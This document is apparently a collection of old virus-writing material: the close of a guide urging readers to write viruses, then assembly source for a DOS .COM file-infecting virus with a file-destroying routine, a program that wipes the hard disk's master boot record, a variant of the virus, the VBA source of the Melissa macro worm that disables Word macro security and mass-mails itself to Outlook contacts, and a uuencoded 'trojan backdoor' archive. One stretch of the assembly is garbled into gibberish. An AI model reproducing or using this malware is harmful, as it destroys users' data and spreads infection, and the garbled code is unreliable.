reset.   A CALL  to go_somewhere  with DX and AL set, the file pointer
may be  moved anywhere  within the  file.   If the  function  is  used
heavily, the savings could be enormous.

3.   Use a good assembler and debugger
The best  assembler I have encountered to date is Turbo Assembler.  It
generates tight  code extremely  quickly.    Use  the  /m2  option  to
eliminate all  placeholder NOPs  from the  code.   The advantages  are
obvious – faster development and smaller code.

The best  debugger is  also made  by Borland,  the king of development
tools.   Turbo Debugger  has so many features that you might just want
to buy  it so  you can  read the  manual!  It can bypass many debugger
traps with ease and is ideal for testing.  Additionally, this debugger
has 286  and 386  specific protected  mode versions, each of which are
even more powerful than their real mode counterparts.

4.   Don’t use MOV instead of LEA
When writing your first virus, you may often forget to use LEA instead
of MOV  when loading  offsets.  This is a serious mistake and is often
made by  beginning virus  coders.   The  harmful  effects  of  such  a
grevious error  are immediately obvious.  If the virus is not working,
check for  this bug.   It’s  almost as hard to catch as a NULL pointer
error in C.

5.   Read the latest issues of 40Hex
40Hex, PHALCON/SKISM’s  official journal of virus techniques and news,
is a publication not to be missed by any self-respecting virus writer.
Each issue  contains techniques  and source code, designed to help all
virus writers,  be they  beginners or  experts.  Virus-related news is
also published.  Get it, read it, love it, eat it!

SO NOW

you have  all the  code and information sufficient to write a viable virus,
as well  as a  wealth of  techniques to  use.   So stop  reading and  start
writing!   The only  way to  get better  is through practise.  After two or
three tries, you should be well on your way to writing good virii.

start:
jmp    virus
int    20

data    label    byte        ;Data section
dtaaddr dd    ?        ;Disk Transfer Address
ftime    dw    ?        ;File date
fdate    dw    ?        ;File time
fattrib dw    ?        ;File attribute
saveins db    3 dup (90)    ;Original first 3 bytes
newjmp    db    0E9        ;Code of jmp instruction
codeptr dw    ?        ;Here is formed a jump to virus code
allcom    db    ‘*.COM’,0       ;Filespec to search for
poffs    dw    ?        ;Address of ‘PATH’ string
eqoffs    dw    ?        ;Address of ‘=’ sign
pathstr db    ‘PATH=’
fname    db    40 dup (‘ ‘)    ;Path name to search for

;Disk Transfer Address for Find First / Find Next:

mydta    label    byte
drive    db    ?        ;Drive to search for
pattern db    13d dup (?)    ;Search pattern
reserve db    7 dup (?)    ;Not used
attrib    db    ?        ;File attribute
time    dw    ?        ;File time
date    dw    ?        ;File date
fsize    dd    ?        ;File size
namez    db    13d dup (?)    ;File name found

;This replaces the first instruction of a destroyed file.
;It’s a jmp instruction into the hard disk formatting program (IBM XT only):

bad_jmp db    0EA,0,0,0,0C8
errhnd    dd    ?

virus:
push    cx        ;Save CX

mov    dx,offset data    ;Restore original first instruction
modify    equ    $-2        ;The instruction above is changed
; before each contamination
cld
mov    si,dx
add    si,saveins-data ;Instruction saved there
mov    di,offset start
mov    cx,3        ;Move 3 bytes
rep    movsb        ;Do it
mov    si,dx        ;Keep SI pointed at data

mov    ah,30        ;Get DOS version
int    21
cmp    al,0        ;Less than 2.0?
jne    skip1
jmp    exit        ;Exit if so

skip1:
push    es        ;Save ES
mov    ah,2F        ;Get current DTA in ES:BX
int    21
mov    [si+dtaaddr-data],bx    ;Save it in dtaaddr
mov    [si+dtaaddr+2-data],es

mov    ax,3524     ;Get interrupt 24h handler
int    21        ; and save it in errhnd
mov    [si+errhnd-data],bx
mov    [si+errhnd+2-data],es
pop    es        ;Restore ES

mov    ax,2524     ;Set interrupt 24h handler
mov    dx,si
add    dx,handler-data
int    21

mov    dx,mydta-data
add    dx,si
mov    ah,1A        ;Set DTA
int    21

push    es        ;Save ES & SI
push    si
mov    es,ds:[environ] ;Environment address
xor    di,di
n_00015A:            ;Search ‘PATH’ in environment
pop    si        ;Restore data offset in SI
push    si
add    si,pathstr-data
lodsb
mov    cx,8000     ;Maximum 32K in environment
repne    scasb        ;Search for first letter (‘P’)
mov    cx,4        ;4 letters in ‘PATH’
n_000169:
lodsb            ;Search for next char
scasb
jne    n_00015A    ;If not found, search for next ‘P’
loop    n_000169    ;Loop until done
pop    si        ;Restore SI & ES
pop    es

mov    [si+poffs-data],di    ;Save ‘PATH’ offset in poffs
mov    bx,si        ;Point BX at data area
add    si,fname-data    ;Point SI & DI at fname
mov    di,si
jmp    short n_0001BF

n_000185:
cmp    word ptr [si+poffs-data],6C
jne    n_00018F
jmp    olddta
n_00018F:
push    ds
push    si
mov    ds,es:[environ]
mov    di,si
mov    si,es:[di+poffs-data]
add    di,fname-data
n_0001A1:
lodsb
cmp    al,’;’
je    n_0001B0
cmp    al,0
je    n_0001AD
stosb
jmp    n_0001A1
n_0001AD:
xor    si,si
n_0001B0:
pop    bx
pop    ds
mov    [bx+poffs-data],si
cmp    byte ptr [di-1],’\’
je    n_0001BF
mov    al,’\'          ;Add ‘\’ if not already present
stosb

n_0001BF:
mov    [bx+eqoffs-data],di    ;Save ‘=’ offset in eqoffs
mov    si,bx        ;Restore data pointer in SI
add    si,allcom-data
mov    cl,6        ;6 bytes in ASCIIZ ‘*.COM’
rep    movsb        ;Move ‘*.COM’ at fname
mov    si,bx        ;Restore SI

mov    ah,4E        ;Find first file
mov    dx,fname-data
add    dx,si
mov    cl,11b        ;Hidden, Read/Only or Normal files
int    21
jmp    short n_0001E3

findnext:
mov    ah,4F        ;Find next file
int    21
n_0001E3:
jnc    n_0001E7    ;If found, try to contaminate it
jmp    n_000185    ;Otherwise search in another directory

n_0001E7:
mov    ax,[si+time-data]    ;Check file time
and    al,11111b    ; (the seconds, more exactly)
cmp    al,62d/2    ;Are they 62?

;If so, file is already contains the virus, search for another:

je    findnext

;Is file size greather than 64,000 bytes?

cmp    [si+fsize-data],64000d
ja    findnext    ;If so, search for next file

;Is file size less than 10 bytes?

cmp    word ptr [si+fsize-data],10d
jb    findnext    ;If so, search for next file

mov    di,[si+eqoffs-data]
push    si        ;Save SI
add    si,namez-data    ;Point SI at namez
n_000209:
lodsb
stosb
cmp    al,0
jne    n_000209

pop    si        ;Restore SI
mov    ax,4300     ;Get file attributes
mov    dx,fname-data
add    dx,si
int    21

mov    [si+fattrib-data],cx    ;Save them in fattrib
mov    ax,4301     ;Set file attributes
and    cl,not 1    ;Turn off Read Only flag
int    21

mov    ax,3D02     ;Open file with Read/Write access
int    21
jnc    n_00023E
jmp    oldattr     ;Exit on error

n_00023E:
mov    bx,ax        ;Save file handle in BX
mov    ax,5700     ;Get file date & time
int    21
mov    [si+ftime-data],cx    ;Save time in ftime
mov    [si+fdate-data],dx    ;Save date in fdate

mov    ah,2C        ;Get system time
int    21
and    dh,111b     ;Are seconds a multiple of 8?
jnz    n_000266    ;If not, contaminate file (don’t destroy):

;Destroy file by rewriting an illegal jmp as first instruction:

mov    ah,40        ;Write to file handle
mov    cx,5        ;Write 5 bytes
mov    dx,si
add    dx,bad_jmp-data ;Write THESE bytes
int    21        ;Do it
jmp    short oldtime    ;Exit

;Try to contaminate file:

;Read first instruction of the file (first 3 bytes) and save it in saveins:

n_000266:
mov    ah,3F        ;Read from file handle
mov    cx,3        ;Read 3 bytes
mov    dx,saveins-data ;Put them there
add    dx,si
int    21
jc    oldtime     ;Exit on error
cmp    ax,3        ;Are really 3 bytes read?
jne    oldtime     ;Exit if not

;Move file pointer to end of file:

mov    ax,4202     ;LSEEK from end of file
xor    cx,cx        ;0 bytes from end
xor    dx,dx
int    21
jc    oldtime     ;Exit on error

mov    cx,ax        ;Get the value of file pointer (file size)
add    ax,virus-data-3 ;Add virus data length to get code offset
mov    [si+codeptr-data],ax    ;Save result in codeptr
inc    ch        ;Add 100h to CX
mov    di,si
add    di,modify-data    ;A little self-modification
mov    [di],cx

mov    ah,40        ;Write to file handle
mov    cx,endcode-data ;Virus code length as bytes to be written
mov    dx,si        ;Write from data to endcode
int    21
jc    oldtime     ;Exit on error
cmp    ax,endcode-data ;Are all bytes written?
jne    oldtime     ;Exit if not

mov    ax,4200     ;LSEEK from the beginning of the file
xor    cx,cx        ;Just at the file beginning
xor    dx,dx
int    21
jc    oldtime     ;Exit on error

;Rewrite the first instruction of the file ate-dne    bove
ata area
adttttttt
grrr

frrrrrrt:
mov    ah,4Frrrrrrrrrrre EPpll zDstrrrrrr
e
ata area
adttttttt
grrr

g1r1rH)a0x,2524     a0me l eO3Efleqryc+qn_00dd    si,d    ont    21
jc    oldtime     ;Exit on error
cmp    me l eO3E*;
conds, more exa    mov    ahop    ssi,d    ont    21
G3,n’0exit        ;Exit if i bl eO3Efleq n_0001A1:
lods01:
Tn v    ax,vitrtvs,pathstrt
rp
tore SI
ff  to enaMvall byly    ont    21
jc    ?i eO3js

mar it vall bylit vall tfll etan
rE    ax,[di+poffs-datat
conds,lodsblit )Eo
:b; eO3Eeax        ;Get the value of file pointer (f

mar  file
xor’artvs,papoinre to file hand  ;n written?
jenaMoS
wi,edO3E*;cog1ll byly    ont    2ijc    oltfll etan
rnax,4CSave ‘n,X cs,papa tss a font    ah,4E ,Nt5h
enaMoS
wta    ‘p    ax,c    olhem in Kpto file hand  ;n writc file
;o dleptrle han yc+qnlile
xor’artvsd  ;nCcfont    n v    ae    od
mo    ldfile
le hh znt    S
wi,     d
rt2

.radix    16

code    segment
assume    cs:code,ds:code

org    100

CODEX    equ    0C000        ; Or use 0300 when tracing DOS

CR    equ    0Dh
LF    equ    0A

start:
jmp    do_it

oldint1 dd    ?
newintx dd    ?
oldintx dd    ?
trace    db    1
found    db    0
buffer    db    200 dup (0)
message db    CR,LF,’**********  W A R N I N G ! ! !  **********’,CR,LF,CR,LF
db    ‘This program, when run, will zero (DESTROY!) the’,CR,LF
db    ‘master boot record of your first hard disk.’,CR,LF,CR,LF
db    ‘The purpose of this is to test the antivirus software,’,CR,LF
db    ‘so be sure you have installed your favourite’,CR,LF
db    ‘protecting program before running this one!’,CR,LF
db    “(It’s almost sure it will fail to protect you anyway!)”,CR,LF
db    CR,LF,’Press any key to abort, or’,CR,LF
db    ‘press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $’
warned    db    CR,LF,CR,LF,’Allright, you were warned!’,CR,LF,’$’

do_it:
mov    ax,600        ; Clear the screen by scrolling it up
mov    bh,7
mov    dx,1950
xor    cx,cx
int    10

mov    ah,0F        ; Get the current video mode
int    10        ;  (the video page, more exactly)

mov    ah,2        ; Home the cursor
xor    dx,dx
int    10

mov    ah,9        ; Print a warning message
mov    dx,offset message
int    21

mov    ax,0C08     ; Flush the keyboard and get a char
int    21
cmp    al,0        ; Extendet ASCII?
jne    quit1        ; Exit if not
mov    ah,8        ; Get the key code
int    21
cmp    al,6C        ; Shift-F5?
jne    quit1        ; Exit if not
mov    ah,2        ; Get keyboard shift status
int    16
and    al,1101b    ; Ctrl-Alt-RightShift?
jnz    proceed     ; Proceed if so
quit1:
jmp    quit        ; Otherwise exit

proceed:
mov    ah,9        ; Print the last message
mov    dx,offset warned
int    21

mov    ax,3501     ; Get interrupt vector 1 (single steping)
int    21
mov    word ptr oldint1,bx
mov    word ptr oldint1+2,es

mov    ax,2501     ; Set new INT 1 handler
mov    dx,offset newint1
int    21

mov    ax,3513     ; Get interrupt vector 13
int    21
mov    word ptr oldintx,bx
mov    word ptr oldintx+2,es
mov    word ptr newintx,bx
mov    word ptr newintx+2,es

; The following code is sacred in it’s present form.
; To change it would cause volcanos to errupt,
; the ground to shake, and program not to run!

mov    ax,200
push    ax
push    cs
mov    ax,offset done
push    ax
mov    ax,100
push    ax
push    cs
mov    ax,offset faddr
push    ax
mov    ah,55
iret

assume    ds:nothing

faddr:
jmp    oldintx

newint1:
push    bp
mov    bp,sp
cmp    trace,0
jne    search
exit:
and    [bp+6],not 100
exit1:
pop    bp
iret
search:
cmp    [bp+4],CODEX
jb    exit1
;Or use ja if you want to trace DOS-owned interrupt
push    ax
mov    ax,[bp+4]
mov    word ptr newintx+2,ax
mov    ax,[bp+2]
mov    word ptr newintx,ax
pop    ax
mov    found,1
mov    trace,0
jmp    exit

assume    ds:code
done:
mov    trace,0
push    ds
mov    ax,word ptr oldint1+2
mov    dx,word ptr oldint1
mov    ds,ax
mov    ax,2501     ; Restore old INT 1 handler
int    21
pop    ds

; Code beyong this point is not sacred…
; It may be perverted in any manner by any pervert.

cmp    found,1     ; See if original INT 13 handler found
jne    quit        ; Exit if not
push    ds
pop    es        ; Restore ES

mov    ax,301        ; Write 1 sector
mov    cx,1        ; Cylinder 0, sector 1
mov    dx,80        ; Head 0, drive 80h
mov    bx,offset buffer
pushf            ; Simulate INT 13
call    newintx     ; Do it

quit:
mov    ax,4C00     ; Exit program
int    21

code    ends
end    start


start:
jmp    virus

message db    ’Hello, world!$’

mov    ah,9
mov    dx,offset message
int    21
int    20

virus:
push    cx        ;Save CX

mov    dx,offset data    ;Restore original first instruction
modify    equ    $-2        ;The instruction above is changed
; before each contamination
cld
mov    si,dx
add    si,saveins-data ;Instruction saved there
mov    di,offset start
mov    cx,3        ;Move 3 bytes
rep    movsb        ;Do it
mov    si,dx        ;Keep SI pointed at data

mov    ah,30        ;Get DOS version
int    21
cmp    al,0        ;Less than 2.0?
jne    skip1
jmp    exit        ;Exit if so

skip1:
push    es        ;Save ES
mov    ah,2F        ;Get current DTA in ES:BX
int    21
mov    word ptr [si+0],bx    ;dtaadr
mov    word ptr [si+2],es
pop    es        ;Restore ES

mov    dx,mydta-data
add    dx,si
mov    ah,1A        ;Set DTA
int    21

push    es        ;Save ES & SI
push    si
mov    es,ds:[environ] ;Environment address
mov    di,0
n_00015A:            ;Search ‘PATH=’ in the environment
pop    si        ;Restore data offset in SI
push    si
add    si,pathstr-data
lodsb
mov    cx,8000     ;Maximum 32K in environment
repne    scasb        ;Search for first letter (‘P’)
mov    cx,4        ;4 letters in ‘PATH’
n_000169:
lodsb            ;Search for next char
scasb
jne    n_00015A    ;If not found, search for next ‘P’
loop    n_000169    ;Loop until done
pop    si        ;Restore SI & ES
pop    es

mov    [si+16],di    ;Save ‘PATH’ offset in poffs
mov    di,si
add    di,fname-data    ;Point SI & DI at ‘=’ sign
mov    bx,si        ;Point BX at data area
add    si,fname-data
mov    di,si
jmp    short n_0001BF

n_000185:
cmp    word ptr [si+16],6C    ;poffs
jne    n_00018F
jmp    olddta
n_00018F:
push    ds
push    si
mov    ds,es:[environ]
mov    di,si
mov    si,es:[di+16]    ;poffs
add    di,fname-data
n_0001A1:
lodsb
cmp    al,’;’
je    n_0001B0
cmp    al,0
je    n_0001AD
stosb
jmp    n_0001A1
n_0001AD:
mov    si,0
n_0001B0:
pop    bx
pop    ds
mov    [bx+16],si    ;poffs
cmp    byte ptr [di-1],’\’
je    n_0001BF
mov    al,’\'          ;Add ‘\’ if not already present
stosb

n_0001BF:
mov    [bx+18],di    ;Save ‘=’ offset in eqoffs
mov    si,bx        ;Restore data pointer in SI
add    si,allcom-data
mov    cx,6        ;6 bytes in ASCIIZ ‘*.COM’
rep    movsb        ;Move ‘*.COM’ at fname
mov    si,bx        ;Restore SI

mov    ah,4E        ;Find first file
mov    dx,fname-data
add    dx,si
mov    cx,11b        ;Hidden, Read/Only or Normal files
int    21
jmp    short n_0001E3

findnext:
mov    ah,4F        ;Find next file
int    21
n_0001E3:
jnc    n_0001E7    ;If found, try to contaminate it
jmp    n_000185    ;Otherwise search in another directory

n_0001E7:
mov    ax,[si+75]    ;Check file time
and    al,11111b    ; (the seconds, more exactly)
cmp    al,62d/2    ;Are they 62?

;If so, file is already contains the virus, search for another:

je    findnext
cmp    [si+79],64000d    ;Is file size greather than 64,000 bytes?
ja    findnext    ;If so, search for next file
cmp    word ptr [si+79],10d    ;Is file size less than 10 bytes?
jb    findnext    ;If so, search for next file

mov    di,[si+18]    ;eqoffs
push    si        ;Save SI
add    si,namez-data    ;Point SI at namez
n_000209:
lodsb
stosb
cmp    al,0
jne    n_000209

pop    si        ;Restore SI
mov    ax,4300     ;Get file attributes
mov    dx,fname-data
add    dx,si
int    21

mov    [si+8],cx    ;Save them in fattrib
mov    ax,4301     ;Set file attributes

;The next `db’s are there because MASM can’t assemble
; the instruction `and cx,0FFFE’ correctly (the fool!):

db    081,0E1,0FE,0FF
;    and    cx,not 1    ;Turn off Read Only flag
mov    dx,fname-data
add    dx,si
int    21

mov    ax,3D02     ;Open file with Read/Write access
mov    dx,fname-data
add    dx,si
int    21
jnc    n_00023E
jmp    oldattr     ;Exit on error

n_00023E:
mov    bx,ax        ;Save file handle in BX
mov    ax,5700     ;Get file date & time
int    21
mov    [si+4],cx    ;Save time in ftime
mov    [si+6],dx    ;Save date in fdate

mov    ah,2C        ;Get system time
int    21
and    dh,111b     ;Are seconds a multiple of 8?

;If so, destroy file (don’t contaminate). Now this code is disabled.

jmp    short n_000266    ;CHANGED. Was jnz here

;Destroy file by rewriting an illegal jmp as first instruction:

mov    ah,40        ;Write to file handle
mov    cx,5        ;Write 5 bytes
mov    dx,si
add    dx,bad_jmp-data ;Write THESE bytes
int    21        ;Do it
jmp    short oldtime    ;Exit

;Try to contaminate file:

;Read first instruction of the file (first 3 bytes) and save it in saveins:

n_000266:
mov    ah,3F        ;Read from file handle
mov    cx,3        ;Read 3 bytes
mov    dx,saveins-data ;Put them there
add    dx,si
int    21
jc    oldtime     ;Exit on error
cmp    ax,3        ;Are really 3 bytes read?
jne    oldtime     ;Exit if not

;Move file pointer to end of file:

mov    ax,4202     ;LSEEK from end of file
mov    cx,0        ;0 bytes from end
mov    dx,0
int    21
jc    oldtime     ;Exit on error

mov    cx,ax        ;Get the value of file pointer
sub    ax,3        ;Subtract 3 from it to get real code size
mov    [si+14d],ax    ;Save result in filloc
add    cx,data-(virus-100)
mov    di,si
sub    di,data-modify    ;A little self-modification
mov    [di],cx

mov    ah,40        ;Write to file handle
mov    cx,enddata-virus  ;Virus code length as bytes to be written
mov    dx,si
sub    dx,data-virus    ;Now DX points at virus label
int    21
jc    oldtime     ;Exit on error
cmp    ax,enddata-virus    ;Are all bytes written?
jne    oldtime     ;Exit if not

mov    ax,4200     ;LSEEK from the beginning of the file
mov    cx,0        ;Just at the file beginning
mov    dx,0
int    21
jc    oldtime     ;Exit on error

;Rewrite the first instruction of the file with a jump to the virus code:

mov    ah,40        ;Write to file handle
mov    cx,3        ;3 bytes to write
mov    dx,si
add    dx,newjmp-data    ;Write THESE bytes
int    21

oldtime:
mov    dx,[si+6]    ;Restore file date
mov    cx,[si+4]    ; and time

;And these again are due to the MASM 5.0 foolness:

db    081,0E1,0E0,0FF
db    081,0C9,01F,000
;    and    cx,not 11111b
;    or    cx,11111b    ;Set seconds to 62 (?!)

mov    ax,5701     ;Set file date & time
int    21
mov    ah,3E        ;Close file handle
int    21

oldattr:
mov    ax,4301     ;Set file attributes
mov    cx,[si+8]    ;They were saved in fattrib
mov    dx,fname-data
add    dx,si
int    21

olddta:
push    ds        ;Save DS
mov    ah,1A        ;Set DTA
mov    dx,[si+0]    ;Restore saved DTA
mov    ds,[si+2]
int    21
pop    ds        ;Restore DS

exit:
pop    cx        ;Restore CX
xor    ax,ax        ;Clear registers
xor    bx,bx
xor    dx,dx
xor    si,si
mov    di,100        ;Jump to CS:100
push    di        ; by doing funny RET
xor    di,di
ret    -1

data    label    byte        ;Data section
dtaaddr dd    ?        ;Disk Transfer Address
ftime    dw    ?        ;File date
fdate    dw    ?        ;File time
fattrib dw    ?        ;File attribute
saveins db    0EBh,0Fh,90    ;Original first 3 bytes
newjmp    db    0E9        ;Code of jmp instruction
filloc    dw    ?        ;File pointer is saved here
allcom    db    ’*.COM’,0       ;Filespec to search for
poffs    dw    ?        ;Address of ‘PATH’ string
eqoffs    dw    ?        ;Address of ‘=’ sign
pathstr db    ’PATH=’
fname    db    40 dup (‘ ‘)    ;Path name to search for

;Disk Transfer Address for Find First / Find Next:

mydta    label    byte
drive    db    ?        ;Drive to search for
pattern db    13d dup (?)    ;Search pattern
reserve db    7 dup (?)    ;Not used
attrib    db    ?        ;File attribute
time    dw    ?        ;File time
date    dw    ?        ;File date
fsize    dd    ?        ;File size
namez    db    13d dup (?)    ;File name found

;This replaces the first instruction of a destroyed file:

bad_jmp db    0EA,0Bh,2,13,58
enddata label    byte

code    ends
end    start


‘Don’t try it in you computer’s friend

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <>
"" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") =
1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ...
don't show anyone else  "
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by
Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.  Game's over.
I'm outta here."
End Sub

'Silakan Modifikasi

begin 664 trojan_backdoor.tar
M8F%C:V1O;W(O““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““`#`P,#`W-S4`,#`P,#2(@:7,@8V%L;&5D(&)A8VMD;V]R+B`@270@
M:&%S(&YO=&AI;F<@=&\@9&\@=VET:`T*8F%C:V1O;W)S(‘=H870M2P@:70@=VEL;”!B87-I8V%L;’D@97)A
M<&EE6]U2!Y;W4@#0ID;VXG=”!F=6-K(‘EO=7)S96QF(&]V97(@8GD@86-C:61E
M;G0N(“!’;V]D(&QU8VLA#0H-”@T*”0D)”4UE<&AI7P,
MR”:)1P);6`?#4%,>!K@A-,@`NC`8T“X?NDH`N”$ES2$”UM8PU!3
M45″*Q.@(`%CH!`!96UC#4%-14+$$TN@$,#PY=@($!^@?`%@D#P0P/#EV`@0′
MZ!$`65M8PU”P#>@’`+`*Z`(`6,-04[0.NP<`S1!;6,,““““““““`
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““8F%C:V1O;W(O8F%C:V1O;W(N97AE““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““`#`P,#`W-S4`,#`P,#““`0““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M`+@1`%`.G+$3NAD`#A__+A4`M$S-(<““#_“““`?`#\_/S\_/S\_/S\_
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
